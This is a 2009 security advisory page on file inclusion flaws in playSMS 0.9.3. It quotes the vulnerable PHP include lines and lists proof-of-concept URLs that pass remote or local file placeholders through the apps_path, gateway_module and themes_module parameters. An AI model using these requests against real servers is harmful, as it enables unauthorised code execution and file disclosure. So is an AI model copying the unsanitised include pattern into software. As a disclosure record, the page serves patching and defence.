playSMS 0.9.3 Multiple Remote/Local File Inclusion Vulnerabilities

2009.01.10
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CWE: CWE-22
CWE-94

==:RFI/LFI:== ===================== script:playsms 0.9.3 ========================================================================== download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0 ========================================================================== vul1: /plugin/gateway/gnokii/init.php lin 2 , 3; 2 include "$apps_path[plug]/gateway/$gateway_module/config.php"; 3 include "$apps_path[plug]/gateway/$gateway_module/fn.php"; ========================================================================== vul2: /plugin/themes/default/init.php lin 2 , 3; 2 include $apps_path[themes]."/".$themes_module."/config.php"; 3 include $apps_path[themes]."/".$themes_module."/fn.php"; ========================================================================== vul3: /lib/function.php lin 4 and... lin4 include "$apps_path[libs]/fn_auth.php"; ========================================================================== xpl: http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]? http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi] http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]? http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi] http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]? ========================================================================== *************************************************** --------------------------------------------------- Author: ahmadbady [kivi_hacker666@yahoo.com] ---------------------------------------------------

References:

http://www.securityfocus.com/bid/33138
http://www.milw0rm.com/exploits/7687
http://secunia.com/advisories/33386


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top